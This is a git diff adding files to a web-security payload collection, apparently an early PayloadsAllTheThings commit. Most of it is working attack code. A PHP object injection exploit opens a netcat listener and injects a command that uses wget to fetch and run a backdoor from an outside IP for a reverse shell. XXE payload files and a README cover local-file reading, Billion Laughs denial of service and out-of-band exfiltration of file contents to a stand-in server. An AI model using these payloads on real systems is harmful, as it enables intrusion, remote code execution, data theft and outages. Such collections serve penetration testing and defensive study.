diff --git a/PHP_Serialization/PHP-Serialization-RCE-Exploit.php b/PHP_Serialization/PHP-Serialization-RCE-Exploit.php
new file mode 100755
index 00000000..af0aae44
--- /dev/null
+++ b/PHP_Serialization/PHP-Serialization-RCE-Exploit.php
@@ -0,0 +1,32 @@
+<?php 
+/*
+PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
+
+A simple PoC to exploit PHP Object Injections flaws and gain remote shell access. 
+
+Shouts to @jstnkndy @yappare for the assist!
+
+NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
+*/
+
+print "==============================================================================\r\n";
+print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
+print "==============================================================================\r\n";
+print "[+] Generating serialized payload...[OK]\r\n";
+print "[+] Launching reverse listener...[OK]\r\n";
+system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
+
+class PHPObjectInjection
+{
+   // CHANGE URL/FILENAME TO MATCH YOUR SETUP
+   public $inject = "system('wget http://92.222.81.2/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
+}
+
+$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
+$url = $url . urlencode(serialize(new PHPObjectInjection));
+print "[+] Sending exploit...[OK]\r\n";
+print "[+] Dropping down to interactive shell...[OK]\r\n";
+print "==============================================================================\r\n";
+$response = file_get_contents("$url");
+
+?>
diff --git a/README.md b/README.md
index 2e31ff90..094b93cc 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,18 @@
-/!\ Work in Progress : 1%
-
 # PayloadsAllTheThings
 A list of every usefull payloads and bypass for Web Application Security
+
+TODO:
+* XSS
+* Upload
+* Traversal Directory
+* Tar
+* SSRF
+* PHP Serialization
+* CSV Injection
+
+To improve:
+* RCE
+* SQL injection
+* XXE
+
+# /!\ Work in Progress : 1%
diff --git a/XXE/Classic XXE B64 Encoded.xml b/XXE/Classic XXE B64 Encoded.xml
new file mode 100755
index 00000000..bc4f01d7
--- /dev/null
+++ b/XXE/Classic XXE B64 Encoded.xml	
@@ -0,0 +1 @@
+<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
\ No newline at end of file
diff --git a/XXE/Classic XXE.xml b/XXE/Classic XXE.xml
new file mode 100755
index 00000000..02f0b27e
--- /dev/null
+++ b/XXE/Classic XXE.xml	
@@ -0,0 +1,6 @@
+<?xml version="1.0"?>
+<!DOCTYPE data [
+<!ELEMENT data (#ANY)>
+<!ENTITY file SYSTEM "file:///sys/power/image_size">
+]>
+<data>&file;</data>
\ No newline at end of file
diff --git a/XXE/Deny Of Service - Billion Laugh Attack b/XXE/Deny Of Service - Billion Laugh Attack
new file mode 100755
index 00000000..e4f21996
--- /dev/null
+++ b/XXE/Deny Of Service - Billion Laugh Attack	
@@ -0,0 +1,8 @@
+<!DOCTYPE data [
+<!ENTITY a0 "dos" >
+<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
+<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
+<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
+<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
+]>
+<data>&a4;</data>
\ No newline at end of file
diff --git a/XXE/README.md b/XXE/README.md
index c707ab4f..da29ba94 100644
--- a/XXE/README.md
+++ b/XXE/README.md
@@ -1,12 +1,48 @@
-# Title
-Lorem	
+# XML External Entity
+An XML External Entity attack is a type of attack against an application that parses XML input	
 
-## Vuln
+## Exploit
 
+Classic XXE
 ```
-Code
+<?xml version="1.0"?>
+<!DOCTYPE data [
+<!ELEMENT data (#ANY)>
+<!ENTITY file SYSTEM "file:///sys/power/image_size">
+]>
+<data>&file;</data>
 ```
 
+Classic XXE Base64 encoded
+```
+<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
+```
+
+Deny Of Service - Billion Laugh Attack
+```
+<!DOCTYPE data [
+<!ENTITY a0 "dos" >
+<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
+<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
+<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
+<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
+]>
+<data>&a4;</data>
+```
+
+
+XXE OOB Attack (Yunusov, 2013)
+```
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
+<data>&send;</data>
+
+File stored on http://publicServer.com/parameterEntity_oob.dtd
+<!ENTITY % file SYSTEM "file:///sys/power/image_size">
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
+%all;
+```
+
+
 ## Thanks to
-* Lorem
-* Ipsum
\ No newline at end of file
+* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
\ No newline at end of file
diff --git a/XXE/XXE OOB Attack (Yunusov, 2013).xml b/XXE/XXE OOB Attack (Yunusov, 2013).xml
new file mode 100755
index 00000000..d36bca6a
--- /dev/null
+++ b/XXE/XXE OOB Attack (Yunusov, 2013).xml	
@@ -0,0 +1,9 @@
+XXE OOB Attack (Yunusov, 2013)
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
+<data>&send;</data>
+
+File stored on http://publicServer.com/parameterEntity_oob.dtd
+<!ENTITY % file SYSTEM "file:///sys/power/image_size">
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
+%all;
\ No newline at end of file